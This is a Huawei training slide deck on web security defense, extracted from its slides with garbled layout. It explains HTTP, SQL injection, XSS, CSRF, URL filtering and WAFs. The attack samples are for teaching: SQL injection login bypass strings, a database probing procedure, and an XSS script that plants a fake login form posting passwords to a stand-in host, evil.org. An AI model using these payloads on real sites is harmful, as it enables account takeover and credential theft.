Web Security

Defense

Copyright © 2017 Huawei Technologies Co., Ltd. All rights reserved.

Foreword

Traditional network attacks and defense methods are becoming mature.

With the explosive development of the application market, web-based
applications are emerging. Under this background, web applications
fall victims to hacking. This chapter describes common attack
methods and defense methods based on web applications.
Objectives

On completion of this course, you will be able to understand:

 Basic structure of web applications, web working principles, HTTP working

process, and HTTP packet structure
 Principles and configurations of URL filtering
 Common technical methods for web security defense
 Common web attacks such as SQL injection and cross-site scripting (XSS)
 Defense principles of the WAF
Contents

01 Web Security Defense Overview

02 Basic Web Principles

03 Web Attack Analysis

04 URL Filtering Technology

05 Malicious Web Page Detection Technology

06 Web Application System Protection Technology

Status Quo of Web Applications

Number of websites implanted with backdoors on the territory

of China in 2016
35000
30000
25000
Unit: number
20000
15000
10000
5000
0
January February March April M ay June July August Sept ember Oct ober November December
Web Attack Sources

 Based on the implementation mechanism of web applications, web attack sources

can be discussed from the following aspects:

Client Server Communication

channel
 Website Trojan horses  Vulnerability of the web server  DoS and CC attacks
 Phishing spoofing  Authorization and authentication  Eavesdropping
 Active attacks attacks  SSL redirection
 XSS attacks
 SQL injection
Contents

01 Web Security Defense Overview

02 Basic Web Principles

03 Web Attack Analysis

04 URL Filtering Technology

05 Malicious Web Page Detection Technology

06 Web Application System Protection Technology

Basic Components of Web Applications

 The web is implemented based on the client/server architecture and consists

of the following parts:

 Use Hypertext Markup Language (HTML) to describe a file.

 Use Uniform Resource Locator (URL) to specify the file location.
 Use Hypertext Transfer Protocol (HTTP) to communicate with the server.

HTTP/HTTPS

Client Server

Display on the client

Access URL:
HTML file
www.Huawei.com

The URL specifies the server file

HTML Example

Define the title of a web

page

Define a web page image

Define a web page button or link

URL Working Process

docroot

Index.html
HTTP/HTTPS

Enterprise

index.html
http://support.huawei.com/enterprise/zh/index.html
service.html

Images

device.jpg

icon.jpg
HTTP/HTTPS

 HTTP is a stateless protocol based on requests/responses.

1 Dear Sir/Madam,
What can I do for you? 2
3
I need the XXX file.
GET /http://class/xxxx 4
HTTP/1.1
5 Do you have a key?
Yes, it's &……%@(#.
6
OK. This is the file you want.
HTTP/1.1 200 OK

 The HTTP has two types of packets:

 Request packet: sent from the client to the server.

 Response packet: returned from the server to the client.
HTTP Request Packets

 An HTTP request packet is formed by the following four parts: request line,
request header, blank line, and request data.
Carriage
Request Protocol Newline
method
Space URL Space
version
return
character
Request line
character
Carriage
Header field Newline
: Value return
name character
character
… Request header
Carriage
Header field Newline
: Value return
name character
character
Carriage Newline
return characte
character r
Request data

In the request methods, the security of POST is higher than that of GET. Some
security risks may come from the GET field.
HTTP Response Packet

 An HTTP response also consists of three parts: status line, response header,
and response data.

Status Carriage return Newline

character Status line
Version Space Space Phrase
code character
Carriage
Header field Newline
: Value return
name character
character Header line
…
(response header)
Carriage
Header field Newline
: Value return
name character
Carriage character
Newline
return
character
character
Response data
Cookie Overview

 The cookie is a technology that maintains HTTP status information on a client.

The web server sends the response packet carrying cookies to a client browser.
Session Overview

 A session is a storage space on a server maintained by an application server.

When a user connects to a server, a unique session ID is generated by the
server. This session ID is used as identify the session storage space of the
server.
 Sessions are stored on the server.
Relationships Between Cookies and Sessions
 When a user requests to use the session page, the web server generates a
session and a session ID and returns a temporary cookie (Key=sessionid). When
the user requests to access the session page for the second time, the cookie
information will be carried in the request. The web server receives the
request, reads the session through the session ID, and returns the
information to the user. Session IDs are saved on the client using cookies.
When a user accesses a page, the session ID will be submitted to the server
for storing session data. This process does not involve R&D personnel's
intervention. Once the cookie is disabled on the client,Sessionid
the session becomes
(data) -> (key
invalid. (1) Request for the session page (2)
valus)
(3) Return a temporary cookie (key=sessionid)

(5) Read the session through the

session ID in the Cookie
(4) Request the session page to carry cookie
Web server
information
Browser (6) Return the information to the user
Contents

01 Web Security Defense Overview

02 Basic Web Principles

03 Web Attack Analysis

04 URL Filtering Technology

05 Malicious Web Page Detection Technology

06 Web Application System Protection Technology

OWASP TOP 10

OWASP Top 10 Application

Security Risks – 2017  Most of the risks listed in
A1: Injection the table are caused by
A2: Invalid identity authentication and session insufficient encryption,
management
defense, and access control.
A3: XSS
 Injection, XSS, and CSRF are
A4: Invalid access control
common web attacks and key
A5: Incorrect security configuration
A6: Sensitive information leak
points in this chapter.
A7: Insufficient attack detection and protection
A8: Cross-site request forgery (CSRF)
A9: Using components with known vulnerabilities
A10: APIs that are not effectively protected
Injection Vulnerabilities

 An injection vulnerability occurs when the application program sends

untrusted data to an interpreter. The essence of an injection vulnerability
is to obfuscate data and execute codes so that the input data becomes
executable.
 SQL injection is the most common and severest injection attack.
 Injection can cause data loss, data damage, lack of auditability, or denial
of service (DoS). Injection vulnerabilities sometimes can lead to the full
host takeover.
SQL Injection

Unexpected results by programmers: Key points for attacks

Username: admin'OR 1=1 --  Inject the attacker's intent into
The -- is the comment
Password: 1 character of MS SQL. the SQL statement through the
The ' is the delimiter.
SELECT COUNT(*) delimiter of the SQL
FROM Users character string  Ensure that the SQL statement is
variable.
WHERE username='admin'OR 1=1 -- 'and password='1' correct using comments.

ORACLE:
In the user name field, enter 'Or' 1 '=' 1 'or' 1 '='
1. Or enter 1 'or' 1 '=' 1 in the password field.

Login
succeeded

Attacker /login.jsp
Basic Procedure for SQL Injection

Check whether an injection

vulnerability exists
and 1=1, or '1' = '1'

Single quotation mark (')

Determine the database type
One semicolon following two straight lines
(;--)

Obtain the database data or

dump the entire database

Escalate privileges and exists (select count(*)

from
XSS

 XSS is one of the most popular network attack methods in recent years. It has
accounted for a large proportion of network attacks. Many websites, such as
Facebook, have encountered such attacks. In fact, the network viruses that
attack Sina Weibo, a well-known company in China, are also caused by XSS
vulnerabilities.
 In essence, XSS is a malicious code execution method. XSS occurs because the
website does not strictly filter the data submitted by users.
 Basic cross-site types:
 Reflected XSS
 Stored XSS
Implementation Procedure for Reflected XSS Attacks

Web server
or application

5. The attacker's
JavaScript is 2. The attacker submits the prepared URL to the user.
executed in the
user's browser. 6. The user's browser sends session tokens to the attacker.
User Attacker
Implementation Procedure for Stored XSS Attacks

Web server
or application

5. The attacker's
JavaScript is
executed in the
user's browser. 6. The user's browser sends session tokens to the attacker.
User Attacker
Example of the Reflected XSS Attacks

I am going to 2 A user clicks the

Wow, this post
publish a post and post on the website.
looks interesting.
put a malicious
I cannot wait to
script in it.
read it.
Blog website

3
I bet you haven’t seen something like this.
The page contains
code and a dialog box
<script> is displayed.
document.body.innerHTML="<h1>Please
Login</h1><form User A
Hacker action=http://evil.org/grabpassword.jsp
method=post><br>User name:<input type=text
name=user><br>Password:<input type=text Should I log in
name=password></p><input type=submit again?
name=login></form>"
The user enters the user name and password,
</script>
and the submitted information is obtained by
the hacker.
The hacker enters the preceding code in a
1 normal web page.
4
CSRF

 CSRF (or XSRF) is also called one-click attack or session riding. It is a

malicious use of websites. CSRF is different from XSS, especially in attack
modes. XSS attacks use trusted users in a site, while CSRF attacks forge
requests from trusted users to exploit trusted websites.
Principle of CSRF Attacks
 A CSRF attack can be completed only when the victim performs the following
two steps in sequence:
 Log in to the trusted website A. Cookies are generated locally.
 Access the malicious website B without logging out of website A.

6. Website A cannot distinguish whether the

request is sent by user C or website B. As the
Website with CSRF
browser automatically carries the cookies of
vulnerabilities:
user C, website A processes the request
Website A
according to the user permissions. In this way,
Attacker: Website B
website B achieves the purpose of simulating
Victim: User C/Website
1. View and log in to the trusted website A. user operations.
A
2. The verification is passed, and the cookies
of the website A are generated for user C. Website A
5. The browser uses the preceding cookies to (Trusted)
access the website A based on the request of
website B.

3. The user accesses the risky website B

without logging out of website A.
4. Website B requests to access the third-party Website B
User C website A and sends a request. (Hacked)
Web Security Defense Methods

Code of conduct

 Using URL filtering to regulate online

behavior
 Using the web credit system to defend
against malicious websites
Web application system
defense/intrusion detection
 Defending against server
vulnerabilities and database
vulnerabilities
 Defending against XSS attacks

Anti-DDoS

 Defending against HTTP flood attacks

Contents

01 Web Security Defense Overview

02 Basic Web Principles

03 Web Attack Analysis

04 URL Filtering Technology

05 Malicious Web Page Detection Technology

06 Web Application System Protection Technology

Necessity of URL Filtering
The security risks brought by social
engineering occupy a large proportion. If employees of an organization access website
URLs, as manual operations performed on resources without restriction, it may:
clients open the first door for web Employee  Greatly reduce the work efficiency of
attacks. Employee
Employee
employees.
 Waste enterprise network bandwidth resources.
News website  Introduce viruses and Trojan horses to the
intranet from malicious sites.
Shopping website FW ……

Video website Porn website

A large amount of pornographic and violent

Service website Violent information affects people's health mentally
website and physically.
URL Address Structure

 Each web page on the Internet has a unique identifier, that is, the URL.

hostname path

http://www.abcd.com:8080/news/education.aspx?name=tom&age=20

[:port] query
URL Filtering Principles

7. If the request is invalid,

the device can also push an
1. A user accesses the website alarm page and then disconnect
www.game.com. the TCP connection.

2. A connection is established www.game.com

through TCP three-way
handshake. www.tech.net
4. The device intercepts the
HTTP GET request and checks
whether the request is valid.

Intranet Employee A
！
Employee B Employee C

FW
6. If the request is invalid,
the device can directly close
3. The browser sends an HTTP the TCP connection.
5. If the request is valid,
GET request. the request is permitted and
the user can access the
corresponding website.
URL Classification and Filtering Technology

 Multiple URL profiles can be created based on user-defined categories or

predefined categories.
 Each URL profile defines the action for classifying URLs.
URL profile of the URL profile of the
R&D department sales department
URL profile Description Category Action Category Action
URL profile of Sports Block News Block
the sales ...
Competitor Allow Politics Allow
department
Search Allow Porn Block
URL profile of
the R&D ... Gaming Block Violence Block
department ... ... ... ...
... ...
... ...
URL Matching Mode

 URL matching modes include prefix matching, suffix matching, keyword matching,
and exact matching.
Character
Matching
Function String Result
Mode
Example
All URLs that start with www.example are matched,
Prefix Matches URLs that start with a specified
www.example* including www.example.com and
matching character string.
www.example.com/solutions.do.
All URLs that end with aspx are matched, including
Suffix Matches all URLs that end with a  www.example.com/news/solutions.aspx and
*aspx
matching specified character string. www.example.com/it/price.aspx.
 10.1.1.1/sports/abc.aspx

All URLs that contain sport are matched, including

Keyword Matches all URLs that contain a
*sport* sports.example.com/news/solutions.aspx and
matching specified character string.
10.1.1.1/sports/.
First compares the URL against the
specified character string. If the URL
Based on matching rules, the following URLs match
does not match the string, the last
www.example.com:
directory in the URL is removed and the  www.example.com
Exact remaining part is compared against the www.example.c 
www.example.com/news
matching string. If the URL is still not matched, om  www.example.com/news/en/
delete the second last directory and  The following URLs do not match www.example.com.
check again. This process continues  www.example.com.cn/news
until the domain name is matched against
the string.
 Traffic reassembly

Applicationrecognition

Protocol decoding

Mode matching
URL Filtering Process

Mode matching result

obtaining

Blacklist and whitelist

URL filtering

filtering

User-defined category
filtering

Malicious URL filtering or

low-reputation URL matching

User-definedlocal cache
query

Predefined remote search

Response
Overall Process of URL Filtering

Trust Untrust

User USG Web server URL category

HTTP access request server
Block
1. Anti-evasion processing
Allow
2. URL whitelist
Block
3. URL blacklist
Block 4. Local user-defined
URL categories
Block 5. Malicious URL search or
low-reputation URL matching.
Block Allow
6. Predefined cache query
Category query
Block Category return
7. Remote category query

Allow
Block
Solution if no policy is matched
Allow
Key Configurations for URL Filtering - URL Categories

3
User-defined URL categories

4 Predefined URL categories

Key Configurations for URL Filtering - URL Filtering Policies (1/2)

If a URL belongs to
3 1 multiple categories, the
2 FW takes an action based
If the URL does not match
on the action pattern.
any blacklist, whitelist,
The action pattern is
or URL category in the
either Strict or Loose.
local cache and the
remote query function for
predefined categories is
4 Configure the URL
unavailable, the FW will
blacklist and whitelist.
take the default action.

Configure this parameter based on the predefined

5
URL category. For details, see the next slide.
Key Configurations for URL Filtering - URL Filtering Policies (2/2)

6
URL filtering level takes
effect only on predefined
categories. The actions
for user-defined
categories must be
manually configured by
the administrator. The
default action is Allow.

Select an action based on URL

7
categories.
Contents

01 Web Security Defense Overview

02 Basic Web Principles

03 Web Attack Analysis

04 URL Filtering Technology

05 Malicious Web Page Detection Technology

06 Web Application System Protection Technology

Malicious URL detection

 Malicious URL sources

 Sandbox interworking
 Antivirus detection
 Low-reputation websites

 Malicious URL detection control

When the malicious URL detection function is enabled in the URL profile, the preceding
malicious URLs are detected in sequence.
Application Scenarios of the Web Reputation System

 Web reputation indicates the credibility of a website. Files on the websites

with high reputation are more secure. The FW determines whether to extract
files from the network traffic for threat detection on the files based on the
reputation of websites.
 URL reputation reflects the reliability of the URL that a user accesses.
 The FW uses the remote query service to obtain the URL reputation and blocks
the low-reputation URLs.
URL reputation

Remote server
Web Reputation System Processing Flow

Website A Website B

Internet
Detection node 1

Extracted files
Cluster
manager Detection node 2

FW

Detection node 3

Enterprise
Traffic of website A
intranet
Traffic of website B
Website Category Divided by Web Reputation

 The Web reputation function categorizes websites into the following four
categories based on their reputation:

 Predefined credible website

 Predefined suspicious website
 User-defined credible website
 Unknown website
Web Reputation System Processing Flow
Start

Extract host information

Match the Yes

user-defined suspicious Restore the file
websites?
No
Match the Yes
user-defined credible Do not restore the file
websites?
No
Match the Yes
user-defined credible Do not restore the file
websites?
No
Unknown website

Restore the file

End
Web Reputation Matching Mode

 The web reputation function extracts the host field information from the URL
of an accessed website and matches the string with web reputation website
categories. The host field can be a domain name or an IP address.

host Field
Level-1 Domain Name Example Matching Mode
Format
N/A 192.168.10.10 or The system directly
IP address 192.168.10.10:8080 matches the string
without any
Does not contain dots example, example-abc, or processing.
(.). example123

Contains one or two example.com or The system performs

Domain name dots (.). example.com.cn character string
matching for
Contains more than www.abc.example.com or example only.
two dots (.). abcd.example.com.cn
Key Configurations of the Web Reputation Function

Enable the Web reputation function.

3
4
Add credible websites.
2

5 Enter suspicious websites.

When users access suspicious
websites, sandbox detection
Indicates the top N is performed first.
6
domain names that have
the largest number of
visits. You can view the
ranking of websites in
the ranking statistics.
Comprehensive Query of Reputation Websites

Enter the domain name of 2

the website to be queried
and click Search. The Web
reputation category of the
website is displayed.

The matching result is determined by the

matching priority because a domain name can be
categorized into different categories. The
displayed Web reputation category is the final
matching result.
Contents

01 Web Security Defense Overview

02 Basic Web Principles

03 Web Attack Analysis

04 URL Filtering Technology

05 Malicious Web Page Detection Technology

06 Web Application System Protection Technology

Security Defects of the Web Application System
Security risks of Security risks of
program design configuration management
 Insecure user access  Security defects in
processing mechanism server configuration
 Insecure data verification management
mechanism  Security defects in
 Insecure system resource database configuration
control mechanism management
 Insecure system border  Security defects in the
protection mechanism configuration management
 Security defects in of the release platform
programming  Security defects in
application configuration
management
Security
vulnerabilities of the
running platform
 Security vulnerabilities
of the application
server
 Security vulnerabilities
of the database
management system
 Security vulnerabilities
of the release platform
Introduction to WAF

 The WAF runs series of security policies for the HTTP/HTTPS to protect web
applications.
 Specifically, the WAF filters each field in an HTTP packet based on rules.
WAF Workflow

 The WAF consists of the execution Front End, back-end center system, and
database.
Web configuration
Front End
Export the detection WAF configurations
result Rule configurations
Blacklist

Data request Generate rule

WAF engine and query logic for
Execution Front detection
Back-end
HTTP packet End
center system
Database
WAF Processing Architecture

Dynamically generate security rules to block IP

addresses that frequently attack websites

Sensitive information
Server vulnerability

SQL injection/CC

submission
attacks
attacks
Normal access
Web
SQL injection/CC attacks Network Security Web service Content
application Normal
security whitelist security security access
Server vulnerability attacks security
check check check check
check
Sensitive information submission

Normal access
WAF Functions

In-depth security
defense

Anti-DDoS/CC Self-learning modeling

attack defense and whitelist defense

WAF functions
High-performance Anti-tempering
detection

Automatic detection High-speed cache

application
In-depth Security Defense

 In-depth security defense consists of two parts:

 Blacklist signature-based detection

 Protocol reassembly detection

 The process is as follows:

Step 1 Step 2 Step 3 Step 4
Check the HTTP request Check the HTTP Check the HTTP Check the HTTP
header request packet response packet response packet
content header content
Check whether the header field
complies with the protocol Check the security of Check whether the header Check whether server
submitted content field complies with the information disclosure
Check the value of the Method
protocol occurs on the HTTP
field
Check the value of the URL field return page.
Check the value of the
Check the value of the Version Response_code field
field The request
Check the value of the
Check the value of the User-Agent method is POST
server field
field
Check the value of the Cookie
Enable the content
field detection of the
Check the value of the Referer response packet
field
In-depth Security Protection - Blacklist Signature-based Detection

XSS attacks
SQL injection
Command injection
Cookie/Session hijacking
Parameter or list
tampering
Buffer overflow attacks
Directory traversal Web applications
CSRF attacks Input detection
Link theft

Web users and hackers

WAF

Output detection Directory traversal

Error message
Information
disclosure
In-depth Security Protection - Protocol Reassembly Detection

Web users and hackers Web applications

WAF

Content after packet cache

and reassembly
Get /index.asp?id=1 and 1=1
DDoS/CC Attack Defense

Web users and hackers Web applications

WAF
Get /show.asp?id=1

Get /show.asp?id=2

Get /show.asp?id=3

Get /show.asp?id=4

Get /show.asp?id=…

Time axis
CC attack defense
00:00:00 00:01:00
module
Self-Learning Modeling and Whitelist Defense

Submission mode: POST

ID card number: a combination of Valid input
18 digits and letters
Password: a combination of 6
digits
Submission mode: POST Invalid input
ID card number: ' or '1' = '1'
Password: 1=1

Web users and hackers Web applications

WAF Output
detection
High-Performance Detection

Web users and hackers Web applications

WAF

High-performance
detection module

WAF rule detection

module
Anti-tampering

Web users and hackers Web applications

WAF

Anti-
tampering
Cache module module
Automatic Detection Application

Web users and hackers Web applications

WAF

Site detection module

Protection site module

High-Speed Cache

Web users and hackers Web applications

WAF

Obtain

User 1

Obtain

User 2
Cache module
WAF Deployment Mode (1/2)

 The WAF supports multiple deployment modes, such as transparent proxy,

reverse proxy, and gateway mode. The transparent proxy mode is most widely
used. The following figure shows the working principle of the transparent
proxy mode.
WAF Deployment Mode (2/2)

Web users and hackers Web applications

WAF

CC attack defense
High-performance

delivery engine
Self-learning

Application
whitelist

Blacklist
signature
database
module

engine
Matches the IP Matches the IP address
address and port Application layer and port number of the
number of the site to site to be protected.
be protected.

Presentation layer
Does not match the IP Session layer Does not match the IP address
address and port number of Transmission layer Proxy/Transparent transmission and port number of the site to
the site to be protected. be protected.
Network layer Proxy/Transparent transmission
Matches the IP address MAC address learning Matches the IP
of the site to be Data link layer address of the site
Data packet forwarding
protected. to be protected.
Physical layer
Does not match the IP Does not match the IP
address of the site to be address of the site to be
protected. protected.
Quiz

1 Which of the following are the main sources of web attacks?

A. Client
B. Server
C. Application software
D. Communication channel

2 Which of the following are XSS attacks?

A. Reflected XSS
B. Anonymous XSS
C. Stored XSS
D. Injection XSS
Summary

 This chapter describes the threats hidden in web applications

and some defense methods starting from the HTTP protocol format.
The chapter can be summarized into the following topics:
 Basic structure of web applications, web working principles, HTTP working
process, and HTTP packet structure
 Principles and configurations of URL filtering
 Common technical methods for web security defense
 Common web attacks (such as SQL injection and XSS)
 Defense principles of the WAF
More Information

 Both the IPS and WAF can detect HTTP vulnerabilities. However, the two
functions are different. For example, in terms of attack sample
identification, the IPS identifies samples using dictionary or keyword
matching, which is not flexible. Contrarily, the WAF supports flexible syntax
such as regular matching, length calculation, and reverse calculation for
object matching, and has multiple complex decoding capabilities.
 As for the working mode, the WAF supports code conversion, whereas the IPS
supports static identification only. Therefore, the WAF is more powerful than
the IPS in web application attack defense.
THANK YOU

HUAWEI TECHNOLOGIES CO., LTD.